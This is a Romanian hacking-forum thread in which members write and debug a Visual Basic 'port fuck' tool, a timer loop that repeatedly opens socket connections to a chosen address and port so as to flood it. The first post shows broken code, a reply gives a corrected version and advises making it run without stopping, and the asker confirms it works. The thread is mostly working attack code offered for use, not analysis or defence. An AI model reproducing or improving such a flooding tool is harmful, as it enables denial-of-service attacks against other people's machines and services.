Bine ati venit pe HackTeam Forum !
Aici veti gasi o gama larga de metode de hack atat pe Windows cat si pe platforme Linux/Unix , programe in consecinta ,tutoriale .
In acelasi timp aici veti gasi si asistenta help in materie corespunzatoare . Precizam ca tot ce se gaseste pe acest site este doar in scop de dezvoltare iar voi va asumati intreaga raspundere pt actiunile pe care le savarsiti . || SS-TEAM || Va Multumeste pt vizita !
|
Lista Forumurilor Pe Tematici
|
Bine ati venit pe HackTeam Forum ! | Reguli | Inregistrare | Login
POZE BINE ATI VENIT PE HACKTEAM FORUM !
Nu sunteti logat.
|
Nou pe simpatie: SweetMonique Profile
 | Femeie 23 ani Galati cauta Barbat 28 - 52 ani |
|
alinho
Membru
 Inregistrat: acum 18 ani
Postari: 62
|
|
am scris un foarte mic cod de port fuck dar m-am incurcat la sfarsit nu stiu daca am facut bine conectarea adica atunci cand ii dau atack sa inceapa port fuck-u, l-am compilat si vad ca nu are probleme de compilare dar cand ii dau attack nu se simte nimik, si inca ceva cum as putea sa ii bag ceva sa arate ca da port fuck in acel moment ceva de genu "port fucking . . . ." (ca si cum ar incarca) sau altfel ??
Code:
Private Sub Command1_Click()
Timer1.Enabled = True
End Sub
Private Sub Command2_Click()
Timer1.Interval = txtInterval
End Sub
Private Sub Form_Load()
End Sub
Private Sub Timer1_Timer()
sock(0).Close
sock(0).RemoteHost = txtAdress
sock(0).RemotePort = txtPort
sock(0).Conect
sock(1).Close
sock(1).RemoteHost = txtAdress
sock(1).RemotePort = txtPort
sock(1).Conect
sock(2).Close
sock(2).RemoteHost = txtAdress
sock(2).RemotePort = txtPort
sock(2).Conect
sock(3).Close
sock(3).RemoteHost = txtAdress
sock(3).RemotePort = txtPort
sock(3).Conect
sock(4).Close
sock(4).RemoteHost = txtAdress
sock(4).RemotePort = txtPort
sock(4).Conect
sock(5).Close
sock(5).RemoteHost = txtAdress
sock(5).RemotePort = txtPort
sock(5).Conect
sock(6).Close
sock(6).RemoteHost = txtAdress
sock(6).RemotePort = txtPort
sock(6).Conect
sock(7).Close
sock(7).RemoteHost = txtAdress
sock(7).RemotePort = txtPort
sock(7).Conect
sock(8).Close
sock(8).RemoteHost = txtAdress
sock(8).RemotePort = txtPort
sock(8).Conect
sock(9).Close
sock(9).RemoteHost = txtAdress
sock(9).RemotePort = txtPort
sock(9).Conect
End Sub |
_______________________________________ عنيف النصب هيأ أصبح أي
|
|
pus acum 18 ani |
|
|
ce vrei tu sa faci...cu " port fucking..."este doar interfatza...il poti testa sa vezi daca merge asa..instalezi firewall si te intreabal daca il lasi sa se conectezi la ipul cutare...btw incearca sa faci cu cat mai putine sockuri si btw la sf codului la timer pune asa Command1=true ca sa nu se opreasca niciodata...sa tot dea sper sa fi inteles...cheers btw: nu trebuia la dc++  
|
|
pus acum 18 ani |
|
alinho
Membru
 Inregistrat: acum 18 ani
Postari: 62
|
|
tocmai din cauza aceasta zic ca nu se simte nimic, am firewall instalat si trebuie sa ceara permisiunea sa se conecteze, dar nu se intampla acest lucru.
_______________________________________ عنيف النصب هيأ أصبح أي
|
|
pus acum 18 ani |
|
|
stai ca il incerc si eu...
|
|
pus acum 18 ani |
|
|
ce gresala ai facut ) uite codul bun
Code:
Private Sub Command1_Click()
Timer1.Enabled = True
End Sub
Private Sub Command2_Click()
Timer1.Interval = txtInterval
End Sub
Private Sub Timer1_Timer()
sock(0).Close
sock(0).RemoteHost = txtAdress
sock(0).RemotePort = txtPort
sock(0).Connect
sock(0).Close
sock(0).RemoteHost = txtAdress
sock(0).RemotePort = txtPort
sock(0).Connect
sock(0).Close
sock(0).RemoteHost = txtAdress
sock(0).RemotePort = txtPort
sock(0).Connect
sock(0).Close
sock(0).RemoteHost = txtAdress
sock(0).RemotePort = txtPort
sock(0).Connect
sock(0).Close
sock(0).RemoteHost = txtAdress
sock(0).RemotePort = txtPort
sock(0).Connect
sock(0).Close
sock(0).RemoteHost = txtAdress
sock(0).RemotePort = txtPort
sock(0).Connect
sock(0).Close
sock(0).RemoteHost = txtAdress
sock(0).RemotePort = txtPort
sock(0).Connect
sock(0).Close
sock(0).RemoteHost = txtAdress
sock(0).RemotePort = txtPort
sock(0).Connect
sock(0).Close
sock(0).RemoteHost = txtAdress
sock(0).RemotePort = txtPort
sock(0).Connect
sock(0).Close
sock(0).RemoteHost = txtAdress
sock(0).RemotePort = txtPort
sock(0).Connect
End Sub |
|
|
pus acum 18 ani |
|
alinho
Membru
 Inregistrat: acum 18 ani
Postari: 62
|
|
nu stiu daca tie itzi merge, dar mie nu mi-a mers
_______________________________________ عنيف النصب هيأ أصبح أي
|
|
pus acum 18 ani |
|
alinho
Membru
 Inregistrat: acum 18 ani
Postari: 62
|
|
deci nu ti-a mers
_______________________________________ عنيف النصب هيأ أصبح أي
|
|
pus acum 18 ani |
|
|
ba da ma...ala al meu e codu' bun ..vezi poate ai uitat sa redenumesti controalele cum trebuie ... el merge
|
|
pus acum 18 ani |
|
alinho
Membru
 Inregistrat: acum 18 ani
Postari: 62
|
|
da , merge mersi man
_______________________________________ عنيف النصب هيأ أصبح أي
|
|
pus acum 18 ani |
|